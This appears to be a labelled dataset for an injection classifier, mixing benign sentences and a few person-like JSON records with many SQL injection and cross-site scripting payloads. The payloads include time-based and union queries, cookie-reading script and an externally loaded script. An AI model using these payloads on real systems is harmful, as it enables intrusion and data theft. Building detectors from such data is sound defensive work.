( select 0 ) end ) --,2,SQLi,15772 "1'|| ( select 'qsgi' where 1707 = 1707 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ) ||'",2,SQLi,12151 Select a place to hang out with friends.,3,normal,24106 "1"" or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14149 "-9953'|| ( select 'zljk' where 2886 = 2886 union all select 2886,2886,2886,2886,2886,2886,2886,2886,2886,2886#",2,SQLi,13646 <svg><figcaption onload=alert(1)></figcaption>,1,XSS,6298 "<acronym onkeyup=""alert(1)"" contenteditable>test</acronym>",1,XSS,3929 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""jwzy"" = ""jwzy",2,SQLi,14411 "Pickup options: Select ""Check store availability"" as you shop online, then select ""Same day pickup"" at checkout.",3,normal,25781 "<IMG SRC=x onsearch=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3608 -3520%' or 8571 = 8571--,2,SQLi,21256 "<noscript><img title=""</noscript><img src onerror=alert(1)>""></noscript>",1,XSS,2332 "1"" ) where 6128 = 6128 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11731 <table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus>,1,XSS,2189 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></footer>",1,XSS,197 "1'+ ( select uqdb where 3508 = 3508 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12380 "1"" ) where 7514 = 7514",2,SQLi,21474 "1"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""phcl"" like ""phcl",2,SQLi,17210 "1 ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( 1773 = 1773",2,SQLi,15978 "-2909'|| ( select 'qfeq' where 7062 = 7062 union all select 7062,7062,7062,7062,7062,7062--",2,SQLi,14662 "<IMG SRC=x onloadedmetadata=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2670 ) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337,2,SQLi,16649 1 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,18476 1 ) ) as jvoo where 5116 = 5116 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,15219 <samp onfocusout=alert(1) tabindex=1 id=x></samp><input autofocus>,1,XSS,2763 "&lt;A HREF=\""http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\""&gt;XSS&lt;/A&gt;",1,XSS,2034 "-5041' ) ) ) union all select 4820,4820,4820,4820,4820,4820--",2,SQLi,17052 <strong id=x tabindex=1 onfocusin=alert(1)></strong>,1,XSS,5105 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( 'hube' = 'hube",2,SQLi,13676 "<style>@keyframes x{}</style><xss style=""animation-name:x"" onanimationstart=""alert(1)""></xss>",1,XSS,1639 <div style=content:url(%(svg)s)></div>,1,XSS,8315 "1 ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 8867 = 8867",2,SQLi,11197 The Love Witch opens in select cinemas on November 11.,3,normal,25420 "<address draggable=""true"" ondragleave=""alert(1)"">test</address>",1,XSS,3076 <button onBeforeUnload=javascript:alert(1)>,1,XSS,7299 "<content draggable=""true"" ondragend=""alert(1)"">test</content>",1,XSS,3280 "<menu onmouseover=""alert(1)"">test</menu>",1,XSS,8006 1 ) ) or sleep ( 5 ) #,2,SQLi,21385 sum,3,normal,23145 "<embed onclick=""alert(1)"">test</embed>",1,XSS,8329 "1%"" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ""%"" = """,2,SQLi,13540 "<canvas onmouseup=""alert(1)"">test</canvas>",1,XSS,7355 "1' ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13474 "1 where 8948 = 8948 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10775 "<body onLoad=while(true) alert('XSS');"">",1,XSS,7832 "select * from users where id = 1 union select @||1,version ( ) -- 1",2,SQLi,16470 "<frame onmouseout=""alert(1)"">test</frame>",1,XSS,7700 "-9227 ) where 6723 = 6723 union all select 6723,6723,6723,6723,6723,6723,6723,6723,6723,6723--",2,SQLi,14451 <button autofocus onfocusin=alert(1)>test</button>,1,XSS,5670 Find data where applicable.,3,normal,23359 "1%' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( '%' = '",2,SQLi,10683 "-5420' ) union all select 2508,2508,2508,2508,2508,2508,2508#",2,SQLi,17087 -8409 ) ) as ipbz where 9984 = 9984 or 3371 = 3869,2,SQLi,18449 <sub onpointerout=alert(1)>XSS</sub>,1,XSS,8936 `'><script>\xE2\x80\x89javascript:alert(1)</script>,1,XSS,5309 Where's the reflexologist?,3,normal,23651 1'+ ( select tart where 9861 = 9861,2,SQLi,20049 Select deal.,3,normal,24771 """ and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,19666 "1' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,12879 1' ) and ( 1414 = 4775 ) *4775 and ( 'mlmw' = 'mlmw,2,SQLi,18281 -8876' ) ) or 3038 = 3038,2,SQLi,21158 "1%"" union all select null,null,null,null--",2,SQLi,19320 "1"" ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""wute"" like ""wute",2,SQLi,11059 end and ( ( ( 'hwrs' like 'hwrs,2,SQLi,20436 <h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1>,1,XSS,5490 1%' ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( '%' = ',2,SQLi,16702 "<abbr onmouseover=""alert(1)"">test</abbr>",1,XSS,8027 "1' ) ) as ijyi where 3694 = 3694 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10772 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10",2,SQLi,16897 "<div draggable=""true"" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable style=display:block>drop here</xss>",1,XSS,692 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'tpih' = 'tpih",2,SQLi,12037 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337,2,SQLi,17010 "1"" ) ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""fktl"" = ""fktl",2,SQLi,10127 "<style>:target {color:red;}</style><option id=x style=""transition:color 1s"" ontransitionend=alert(1)></option>",1,XSS,1016 "<div draggable=""true"" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template>",1,XSS,871 <listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus>,1,XSS,1995 "1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""mbas"" = ""mbas",2,SQLi,10650 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""squx"" like ""squx",2,SQLi,11973 "1'+ ( select 'idmr' where 5029 = 5029 union all select null,null,null,null,null,null--",2,SQLi,14863 "1 ) ) as zkrr where 4730 = 4730 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,14948 "1"" ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( ""suxh"" = ""suxh",2,SQLi,10582 <;scrscriptipt>;alert(1)<;/scrscriptipt>;,1,XSS,7613 "xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(""XSS""))'>",1,XSS,5285 "<slot onbeforecut=""alert(1)"" contenteditable>test</slot>",1,XSS,4372 &lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;,1,XSS,1363 select * from users where id = 1 or \+<\ or 1 = 1 -- 1,2,SQLi,17934 //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//,1,XSS,1631 "1"" where 4445 = 4445 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,12649 "<style>@keyframes x{}</style><embed style=""animation-name:x"" onanimationstart=""alert(1)""></embed>",1,XSS,1553 end and ( ( ( 'gqhc' = 'gqhc,2,SQLi,20838 "{""id"":null,""firstName"":""Huang Soon"",""lastName"":""Thyng"",""address"":""57 Haven Ave #90"",""city"":""733"",""telephone"":""2990476900""}",3,normal,27202 "))) AND ELT(1337=1337,SLEEP(5)) AND (((1337"" LIKE ""1337",2,SQLi,17745 1' ) ) as bbdf where 1327 = 1327,2,SQLi,20309 1' ) where 9516 = 9516,2,SQLi,21456 <html onpointermove=alert(1)>XSS</html>,1,XSS,8255 "-8013%"" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""%"" = """,2,SQLi,10466 1%' ) ) rlike ( select ( case when ( 6094 = 7893 ) then 1 else 0x28 end ) ) and ( ( '%' = ',2,SQLi,14655 Where is the database file?,3,normal,23462 "<audio oncopy=""alert(1)"" contenteditable>test</audio>",1,XSS,5041 "1' ) union all select null,null,null,null,null--",2,SQLi,18754 A select band of just 29 talking heads featured in I Love 1970; an average of one new pundit every two minutes.,3,normal,26428 1' where 1593 = 1593,2,SQLi,21900 "On this page, you'll see all of your current contacts and a 'More Actions' drop-down menu, which allows you to select 'Import.' A pop-up window will ask you to select a .csv file -- and I bet you can guess which one you're going to use here.",3,normal,25839 <x contenteditable onkeyup=alert(1)>press any key!,1,XSS,5696 <center id=x tabindex=1 onfocusin=alert(1)></center>,1,XSS,5121 "x' and email is NULL,",2,SQLi,21581 "<style>:target {color: red;}</style><tr id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></tr>",1,XSS,1136 "1'+ ( select 'ayod' where 7839 = 7839 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ) +'",2,SQLi,11020 "1"" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""vzud"" like ""vzud",2,SQLi,10302 "-6095"" ) as hygc where 8142 = 8142 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10475 "<meter draggable=""true"" ondragend=""alert(1)"">test</meter>",1,XSS,4019 "1%"" ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""%"" = """,2,SQLi,10433 "<a href=""\x17javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2426 "<meta draggable=""true"" ondragstart=""alert(1)"">test</meta>",1,XSS,4140 "1'+ ( select mems where 5091 = 5091 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) ) +'",2,SQLi,12072 "<style>:target {color:red;}</style><datalist id=x style=""transition:color 1s"" ontransitionend=alert(1)></datalist>",1,XSS,861 <isindex formaction=javascript:alert(1) type=submit value=click>,1,XSS,2964 "<a href=""\x0Ejavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2428 "The following is a select list of genera of miscellaneous decorative plants (orchids, palms and ferns excluded; climbers are denoted by *; bulbous and tuberous plants by f) Stove Plants.",3,normal,25446 1 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ),2,SQLi,17772 "<link onmouseenter=""alert(1)"">test</link>",1,XSS,7677 "-4947' in boolean mode ) union all select 3314,3314#",2,SQLi,18187 1'+ ( select 'hhnz' where 2465 = 2465,2,SQLi,19898 "During the second period of his service in Congress, which lasted until 1785, he was a member of the committee to consider the treaty of peace with Great Britain, and chairman of two committees appointed to select a permanent seat of government.",3,normal,26226 "-7815' union all select 2638,2638,2638,2638,2638--",2,SQLi,18509 "1"" ) union all select null,null,null,null,null,null#",2,SQLi,18226 "1"" ) as drrx where 8633 = 8633 union all select null,null,null--",2,SQLi,16777 "<image oncopy=""alert(1)"" contenteditable>test</image>",1,XSS,4939 "1' ) ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 'jicq' like 'jicq",2,SQLi,10920 "<a onbeforecopy=""alert(1)"" contenteditable>test</a>",1,XSS,5287 "<area onmouseup=""alert(1)"">test</area>",1,XSS,8370 -8051 ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( 5637 = 5637,2,SQLi,12929 <center id=x tabindex=1 onbeforedeactivate=alert(1)></center><input autofocus>,1,XSS,2095 Urban Outfitters: 25 percent off select items; through May 30.,3,normal,25202 "1"" ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( ""agaz"" = ""agaz",2,SQLi,11360 "1'|| ( select 'ypil' from dual where 4568 = 4568 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ) ||'",2,SQLi,11707 http://www.<script>alert(1)</script .com,1,XSS,7820 "<STYLE>li {list-style-image: url(\""javascript:alert('XSS')\"");}</STYLE><UL><LI>XSS",1,XSS,1922 "<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>",1,XSS,84 AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe,2,SQLi,17224 "1%' ) ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13342 Select the right music for the occasion.,3,normal,24182 "<spacer onpaste=""alert(1)"" contenteditable>test</spacer>",1,XSS,4398 "<col onmousemove=""alert(1)"">test</col>",1,XSS,8478 Select a new outfit.,3,normal,22550 "select sleep ( 5 ) and ""%"" = """,2,SQLi,20530 "-9405' ) union all select 8283,8283,8283,8283--",2,SQLi,18869 "<video oncanplaythrough=alert(1)><source src=""validvideo.mp4"" type=""video/mp4""></video>",1,XSS,1815 "<div draggable=""true"" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable>drop here</hr>",1,XSS,1273 "1"" ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ""qkds"" like ""qkds",2,SQLi,15250 &lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;,1,XSS,2996 "In many agencies, the birth mothers select the prospective parents by searching through detailed portfolios that prospective parents have made.",3,normal,26010 "select * from users where id = '1' + @ @1 union select 1,version ( ) -- 1'",2,SQLi,15698 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9",2,SQLi,15462 "We got tossed into the establishment lane, we didn't select it.",3,normal,25180 Select a cooking method for the recipe.,3,normal,24183 <listing onblur=alert(1) tabindex=1 id=x></listing><input autofocus>,1,XSS,2644 <svg><main onload=alert(1)></main>,1,XSS,9283 Delete the app.,3,normal,22868 1' ) ) and 4242 = 5831 and ( ( 'xflh' like 'xflh,2,SQLi,18713 "{""id"":null,""firstName"":""Zi Yang"",""lastName"":""Wong"",""address"":""145 ROWAN STREET, FAYETTEVILLE NC 28301"",""city"":""30"",""telephone"":""2578350741""}",3,normal,27458 "elt ( 5953 = 5953,1 )",2,SQLi,21593 "<SCRIPT a="">"" '' SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,4197 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ""uidb"" like ""uidb",2,SQLi,13056 "1"" ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ""jyad"" = ""jyad",2,SQLi,12792 "1"" ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ""mlld"" like ""mlld",2,SQLi,12384 "<meta onbeforepaste=""alert(1)"" contenteditable>test</meta>",1,XSS,3851 "{""id"":null,""firstName"":""Sam"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27412 Why did you select the article and performer you did?,3,normal,25129 1 ) where 1527 = 1527 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,16218 1' ) where 2330 = 2330 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,15277 ")))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,19257 "-2803' ) as jciy where 1130 = 1130 or make_set ( 4599 = 6550,6550 ) --",2,SQLi,16217 "<noframes draggable=""true"" ondrag=""alert(1)"">test</noframes>",1,XSS,3556 "-6527' ) ) union all select 5053,5053,5053,5053--",2,SQLi,18603 select ( case when ( 8916 = 1357 ) then 8916 else 8916* ( select 8916 from information_schema.character_sets ) end ) #,2,SQLi,13261 <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>,1,XSS,2602 Where's the esthetician?,3,normal,23649 Plant a fragrant rose.,3,normal,22589 "<style>@keyframes x{}</style><thead style=""animation-name:x"" onanimationstart=""alert(1)""></thead>",1,XSS,1520 "<mark onbeforecopy=""alert(1)"" contenteditable>test</mark>",1,XSS,4119 Modify the security measures.,3,normal,22735 "1%"" or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ""%"" = """,2,SQLi,10849 "<del oncopy=""alert(1)"" contenteditable>test</del>",1,XSS,5757 "<wbr onpaste=""alert(1)"" contenteditable>test</wbr>",1,XSS,5635 <bdi onpointerenter=alert(1)>XSS</bdi>,1,XSS,8402 Select your department.,3,normal,24867 """The type of exercise you select is very important,"" Milton says.",3,normal,26454 "1%"" ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( ""%"" = """,2,SQLi,13089 "<source onmouseout=""alert(1)"">test</source>",1,XSS,7165 or 'one'='one,2,SQLi,22224 "1%"" ) union all select null,null#",2,SQLi,20210 "select * from generate_series ( 7494,7494,case when ( 7494 = 7854 ) then 1 else 0 end ) limit 1--",2,SQLi,14280 "1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and 'cotv' like 'cotv",2,SQLi,11761 """,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,15465 <isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus>,1,XSS,1990 "<head onmouseleave=""alert(1)"">test</head>",1,XSS,7740 "1' ) ) ) and elt ( 9501 = 8427,8427 ) and ( ( ( 'ahpp' = 'ahpp",2,SQLi,16925 "1' ) as tygi where 9891 = 9891 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10585 Order a fresh salad.,3,normal,22586 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><style id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></style>",1,XSS,203 "{""id"":null,""firstName"":""Cindy"",""lastName"":""Kong"",""address"":""12 Fishery Port Road"",""city"":""527"",""telephone"":""2379511044""}",3,normal,26989 1%' ) order by 1#,2,SQLi,22108 or pg_sleep ( __TIME__ ) --,2,SQLi,20869 1') WAITFOR DELAY '0:0:5' AND ('1337'='1337,2,SQLi,19169 1' ) as irnj where 7274 = 7274 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,15190 &&SLEEP(5)--,2,SQLi,22329 "<a href=""javascript&colon;alert&lpar;1&rpar;"">XSS</a>",1,XSS,4857 One remedy is to select who can and can't message you.,3,normal,25828 <svg/onload=alert('')>,1,XSS,9744 "1' ) as ccee where 8880 = 8880 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12526 "1' ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15974 "1' ) union all select null,null,null,null,null#",2,SQLi,18846 "<style draggable=""true"" ondragstart=""alert(1)"">test</style>",1,XSS,3767 I need to select the best photo for the album.,3,normal,23775 "1%' or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13476 "<object oncontextmenu=""alert(1)"">test</object>",1,XSS,6434 "<image onmouseup=""alert(1)"">test</image>",1,XSS,7849 procedure,3,normal,23163 "1' ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 'uwrm' = 'uwrm",2,SQLi,12277 Select from options.,3,normal,22766 1 and 8398 = 1891-- naov,2,SQLi,21236 "1 ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16426 -6190' ) ) ) union all select 9413--,2,SQLi,19968 1' ) ) as fbjd where 8597 = 8597,2,SQLi,20359 ") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (1337"" LIKE ""1337",2,SQLi,16457 "{""id"":null,""name"":""bell""}",3,normal,27484 "<style>:target {color: red;}</style><frame id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></frame>",1,XSS,889 <details ontoggle=alert(1) open>test</details>,1,XSS,6263 <wbr id=x tabindex=1 onfocus=alert(1)></wbr>,1,XSS,6992 <font id=x tabindex=1 onfocusin=alert(1)></font>,1,XSS,6045 "1, ( select ( case when ( 5141 = 5141 ) then ( ascii ( regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ) else 5141/ ( select 0 from ( values ( 0 ) ) ) end ) from ( values ( 0 ) ) )",2,SQLi,10832 ") or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,19576 "-5313' ) union all select 7187,7187,7187#",2,SQLi,19357 "<style>@keyframes x{}</style><element style=""animation-name:x"" onanimationstart=""alert(1)""></element>",1,XSS,1426 "select count ( * ) from generate_series ( 1,5000000 ) and ( '%' = '",2,SQLi,16547 "select * from users where id = '1' or \<$ union select 1,@@VERSION -- 1'",2,SQLi,15948 1 ) rlike sleep ( 5 ) and ( 5724 = 5724,2,SQLi,19605 "1"" ) where 2070 = 2070",2,SQLi,21546 "<div id=""64""><!DOCTYPE x[<!ENTITY x SYSTEM ""http://html5sec.org/test.xxe"">]><y>&x;</y>//[""'`-->]]>]</div><div id=""65""><svg onload=""javascript:alert(65)"" xmlns=""http://www.w3.org/2000/svg""></svg>//[""'`-->]]>]</div>",1,XSS,114 <track onpointerup=alert(1)>XSS</track>,1,XSS,8163 Save up to 80% off select Best Selling Kindle eBooks,3,normal,25709 "1 ) ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16223 <slot id=x tabindex=1 onbeforeactivate=alert(1)></slot>,1,XSS,4561 "1%"" ) ) ) or sleep ( 5 ) #",2,SQLi,21009 Select a board game for game night.,3,normal,24135 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",2,SQLi,11466 "-5148"" ) ) or 5310 = 8229",2,SQLi,21104 "1'|| ( select 'ojdz' where 7350 = 7350 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) ||'",2,SQLi,11278 Select water.,3,normal,24513 "<td onmouseenter=""alert(1)"">test</td>",1,XSS,8569 "1"" ) as hymr where 5497 = 5497 union all select null,null,null,null--",2,SQLi,16335 "-4927' ) ) union all select 1924,1924#",2,SQLi,19685 "1 ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( 5220 = 5220",2,SQLi,10782 1 ) ) as prxq where 4600 = 4600,2,SQLi,20477 "-9854%"" ) ) ) or 6455 = 3652",2,SQLi,20820 "-5810 union all select 6307,6307,6307,6307,6307,6307,6307--",2,SQLi,17290 -6081 where 3681 = 3681 or 2603 = 3138--,2,SQLi,19501 "-1106' ) ) union all select 2855,2855,2855,2855,2855,2855,2855#",2,SQLi,16859 "<label draggable=""true"" ondragstart=""alert(1)"">test</label>",1,XSS,3733 It premieres on Netflix and in select theaters on October 5.,3,normal,25961 "<em draggable=""true"" ondragenter=""alert(1)"">test</em>",1,XSS,4988 "1 ) ) ) union all select null,null#",2,SQLi,20071 <strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus>,1,XSS,2765 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ""seci"" = ""seci",2,SQLi,13818 Select your fluctuate.,3,normal,25046 "<div id=""124""><script src=""/\example.com\foo.js""></script> // Safari 5.0, Chrome 9, 10",1,XSS,1857 "1'|| ( select 'mzsy' where 4940 = 4940 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,15623 "1"" ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ""qqky"" like ""qqky",2,SQLi,12836 "<style>:target {color: red;}</style><body id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></body>",1,XSS,1001 